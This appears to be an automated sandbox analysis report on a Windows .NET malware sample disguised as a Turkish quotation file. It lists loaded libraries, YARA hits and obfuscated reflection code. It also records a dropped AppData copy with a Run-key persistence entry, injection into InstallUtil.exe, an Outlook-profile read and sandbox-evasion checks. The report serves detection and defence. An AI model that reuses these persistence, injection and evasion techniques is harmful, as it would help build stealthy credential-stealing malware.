                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll, ntmarta.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, wtsapi32.dll, winsta.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, vaultcli.dll, wintypes.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, vaultcli.dll, wintypes.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: Teklif-6205018797-6100052155-UUE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Teklif-6205018797-6100052155-UUE.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000027FC000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003549000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2232534783.0000000005A10000.00000004.08000000.00040000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2477328871.0000000003FA7000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2558909751.0000000003977000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002A78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000027FC000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003549000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2232534783.0000000005A10000.00000004.08000000.00040000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2477328871.0000000003FA7000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2558909751.0000000003977000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002A78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, g36spvPwU0M3Ss1qIRI.cs .Net Code: Type.GetTypeFromHandle(EhIm2WlCnmZKGsw35uE.Ilwox0q1P9(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(EhIm2WlCnmZKGsw35uE.Ilwox0q1P9(16777259)),Type.GetTypeFromHandle(EhIm2WlCnmZKGsw35uE.Ilwox0q1P9(16777263))})
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.58d0000.12.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.58d0000.12.raw.unpack, ListDecorator.cs .Net Code: Read
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.58d0000.12.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.58d0000.12.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.58d0000.12.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3f03bc0.8.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3f03bc0.8.raw.unpack, ListDecorator.cs .Net Code: Read
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3f03bc0.8.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3f03bc0.8.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3f03bc0.8.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                      Source: Yara match File source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5860000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3e25f60.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.2231136103.0000000005860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.2206832205.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.2446673623.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.2532866894.0000000002918000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: Teklif-6205018797-6100052155-UUE.exe PID: 3060, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: Ptqlzgvzpfa.exe PID: 1120, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: Ptqlzgvzpfa.exe PID: 2928, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Code function: 0_2_057C0D13 push eax; iretd 0_2_057C0D1D
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Code function: 0_2_057C2EA7 push esp; retf 0_2_057C2EA8
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Code function: 0_2_0596D1F2 push ebp; retf 0_2_0596D24D
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Code function: 0_2_059875F3 push es; retf 0_2_059875FE
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Code function: 0_2_05989134 pushfd ; ret 0_2_0598913D
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Code function: 0_2_05985F92 pushfd ; ret 0_2_05985FA1
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Code function: 0_2_05987AF3 push ss; iretd 0_2_05987AFB
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Code function: 0_2_05A061D9 pushfd ; ret 0_2_05A061DC
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Code function: 0_2_05A06D6E push ecx; ret 0_2_05A06D74
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Code function: 0_2_05A0363A pushfd ; retf 0_2_05A0363D
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Code function: 0_2_05C71700 pushfd ; iretd 0_2_05C71701
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_062B2EA7 push esp; retf 4_2_062B2EA8
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_06343CF1 push es; ret 4_2_06343D18
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_0642F770 push es; ret 4_2_0642F780
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_0645C4E8 push es; retf 4_2_0645C4F4
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_06477AF3 push ss; iretd 4_2_06477AFB
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_06475F9D pushfd ; ret 4_2_06475FA1
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_0647D09E push ds; iretd 4_2_0647D0A5
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_06479130 pushfd ; ret 4_2_0647913D
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_064775F3 push es; retf 4_2_064775FE
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_064F363A pushfd ; retf 4_2_064F363D
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_064F6D73 push ecx; ret 4_2_064F6D74
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_064F61D9 pushfd ; ret 4_2_064F61DC
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_06761700 pushfd ; iretd 4_2_06761701
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 4_2_0676001B push es; iretd 4_2_0676001C
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 5_2_05B92EA7 push esp; retf 5_2_05B92EA8
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 5_2_05C2E42B push cs; iretd 5_2_05C2E432
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 5_2_05C2E429 push cs; iretd 5_2_05C2E42A
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 5_2_05C2E3E0 push cs; iretd 5_2_05C2E3E2
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 5_2_05D015D8 push edx; iretd 5_2_05D015DA
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Code function: 5_2_05D01768 push ebx; iretd 5_2_05D0176A
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, AssemblyLoader.cs High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'PEimRsseBfTusqraovp'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, Gqfrh5VJhZISS6rJnaN.cs High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'rT0VZfMBok', 'NtProtectVirtualMemory', 'LFJZ1gWiNtxaPgs03nt', 'yKPyRNW8IiXDTbOK19D', 'rNGYriWuRnddapUpTJm', 'trarFUWCfJQkqdaBqOv'
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe File created: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ptqlzgvzpfa
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: Teklif-6205018797-6100052155-UUE.exe PID: 3060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 1120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 2928, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002918000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory allocated: 750000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory allocated: B10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 23E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 25F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 45F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: 1300000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: 4F00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: D20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: E80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: F60000 memory reserve | memory write watch
